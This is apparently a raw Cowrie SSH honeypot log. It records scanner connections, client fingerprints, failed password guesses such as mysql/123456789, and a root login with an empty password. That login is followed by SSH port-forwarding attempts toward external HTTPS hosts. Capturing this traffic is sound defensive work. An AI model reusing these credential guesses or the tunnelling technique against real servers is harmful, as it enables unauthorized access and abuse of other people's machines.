{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50782,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d44ab7db03a","protocol":"ssh","message":"New connection: 212.227.235.229:50782 (1.2.3.4:22) [session: 4d44ab7db03a]","sensor":"my-vps","timestamp":"2025-08-31T04:04:35.343907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:04:36.139463Z","src_ip":"212.227.235.229","session":"4d44ab7db03a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:04:36.140446Z","src_ip":"212.227.235.229","session":"4d44ab7db03a"}
{"eventid":"cowrie.session.closed","duration":"75.8","message":"Connection lost after 75.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:04:39.362522Z","src_ip":"212.227.125.160","session":"2a6ce754822b"}
{"eventid":"cowrie.session.closed","duration":"23.8","message":"Connection lost after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:04:41.633226Z","src_ip":"212.227.125.160","session":"5bd8dadc5342"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456789","message":"login attempt [mysql/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:42.256958Z","src_ip":"212.227.235.229","session":"4d44ab7db03a"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:04:44.081605Z","src_ip":"212.227.235.229","session":"4d44ab7db03a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40540,"dst_ip":"1.2.3.4","dst_port":22,"session":"db4a14b52c14","protocol":"ssh","message":"New connection: 212.227.125.160:40540 (1.2.3.4:22) [session: db4a14b52c14]","sensor":"my-vps","timestamp":"2025-08-31T04:04:56.932148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:04:57.228004Z","src_ip":"212.227.125.160","session":"db4a14b52c14"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:04:57.228724Z","src_ip":"212.227.125.160","session":"db4a14b52c14"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456789","message":"login attempt [mysql/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:59.428524Z","src_ip":"212.227.125.160","session":"db4a14b52c14"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43302,"dst_ip":"1.2.3.4","dst_port":22,"session":"028deaf76979","protocol":"ssh","message":"New connection: 212.227.125.160:43302 (1.2.3.4:22) [session: 028deaf76979]","sensor":"my-vps","timestamp":"2025-08-31T04:05:00.459502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","message":"Remote SSH version: SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3","sensor":"my-vps","timestamp":"2025-08-31T04:05:00.460694Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.client.kex","hassh":"390ffe68a68c2a2891210413e80689fa","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","sk-ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","sk-ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","sk-ecdsa-sha2-nistp256@openssh.com","ssh-ed25519","sk-ssh-ed25519@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 390ffe68a68c2a2891210413e80689fa","sensor":"my-vps","timestamp":"2025-08-31T04:05:00.518483Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:05:00.802595Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:05:00.873579Z","src_ip":"212.227.125.160","session":"db4a14b52c14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"54.171.12.40","dst_port":443,"src_ip":"212.227.125.160","src_port":55688,"message":"direct-tcp connection request to 54.171.12.40:443 from 127.0.0.1:55688","sensor":"my-vps","timestamp":"2025-08-31T04:05:02.424508Z","session":"028deaf76979"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"54.171.12.40","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd7\\xbc\\x14a@\\x98#\\n\\xd7\\x8c\\x0c\\xcd\\x85\\xd0^\\x8bk)\\xe4;p}\\xeb\\xab\\x0c\\xec2\\xe4.\\x9f\\x92\\x08 \\xcb\\x86(:\\xef\\xbc,\\x92m\\xa1\\xb4\\xa2\\x18uWq@\\xa9\\xa6R\\x8a0q\\xd5\\x05y\\x01\\xf4.\\xf1Zt\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x85<&\\xda\\x18\\x07:\\x86\\xc2\\x08Y\\x9d\\x94U\\x9e\\x94ou\\xc0\\r\\x9c\\xaf\\xb3\\x13\\xf0\\x91\\x0eu\\xf07A\\x1b\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 54.171.12.40:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xd7\\xbc\\x14a@\\x98#\\n\\xd7\\x8c\\x0c\\xcd\\x85\\xd0^\\x8bk)\\xe4;p}\\xeb\\xab\\x0c\\xec2\\xe4.\\x9f\\x92\\x08 \\xcb\\x86(:\\xef\\xbc,\\x92m\\xa1\\xb4\\xa2\\x18uWq@\\xa9\\xa6R\\x8a0q\\xd5\\x05y\\x01\\xf4.\\xf1Zt\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\x85<&\\xda\\x18\\x07:\\x86\\xc2\\x08Y\\x9d\\x94U\\x9e\\x94ou\\xc0\\r\\x9c\\xaf\\xb3\\x13\\xf0\\x91\\x0eu\\xf07A\\x1b\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T04:05:02.672498Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.76.24.222","dst_port":443,"src_ip":"212.227.125.160","src_port":56340,"message":"direct-tcp connection request to 104.76.24.222:443 from 127.0.0.1:56340","sensor":"my-vps","timestamp":"2025-08-31T04:05:03.170108Z","session":"028deaf76979"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.76.24.222","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03(\\xc3\\xe7\\x04\\xf3\\xea5\\x8dS\\x92\\xd1\\xc5,1*#\\xe4`)\\xf9\\xddv\\x90\\xd56\\x81\\x86\\x08\\x94X\\xfaG |\\x0cP\\t\\x18\\xc8\\x16\\x87\\x98WT\\xf7\\x08L\\x8095\\x9d\\xa8\\xb2\\xcd\\xb8*\\xb0\\xa3\\xf8\\\\\\xd2*\\x9d\\xe1&\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa3\\xbe\\xa2\\xeb6\\x1c}\\xce\\xe0\\x07\\xe9\\n\\xe9\\xf4\\xde\\tH\\x19w\\xc1\"m\\xa2{oE\\xf6\\x06\\x0ex\\xbe9\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 104.76.24.222:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03(\\xc3\\xe7\\x04\\xf3\\xea5\\x8dS\\x92\\xd1\\xc5,1*#\\xe4`)\\xf9\\xddv\\x90\\xd56\\x81\\x86\\x08\\x94X\\xfaG |\\x0cP\\t\\x18\\xc8\\x16\\x87\\x98WT\\xf7\\x08L\\x8095\\x9d\\xa8\\xb2\\xcd\\xb8*\\xb0\\xa3\\xf8\\\\\\xd2*\\x9d\\xe1&\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xa3\\xbe\\xa2\\xeb6\\x1c}\\xce\\xe0\\x07\\xe9\\n\\xe9\\xf4\\xde\\tH\\x19w\\xc1\"m\\xa2{oE\\xf6\\x06\\x0ex\\xbe9\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T04:05:03.283128Z","src_ip":"212.227.125.160","session":"028deaf76979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41190,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7aa85b67f09","protocol":"ssh","message":"New connection: 212.227.235.229:41190 (1.2.3.4:22) [session: d7aa85b67f09]","sensor":"my-vps","timestamp":"2025-08-31T04:05:03.795177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:05:03.796363Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:05:04.046542Z","src_ip":"212.227.235.229","session":"d7aa85b67f09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.203.132","dst_port":443,"src_ip":"212.227.125.160","src_port":57676,"message":"direct-tcp connection request to 142.250.203.132:443 from 127.0.0.1:57676","sensor":"my-vps","timestamp":"2025-08-31T04:05:04.068249Z","session":"028deaf76979"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38076,"dst_ip":"1.2.3.4","dst_port":22,"session":"80861cc87e61","protocol":"ssh","message":"New connection: 212.227.235.229:38076 (1.2.3.4:22) [session: 80861cc87e61]","sensor":"my-vps","timestamp":"2025-08-31T04:05:04.345383Z"}
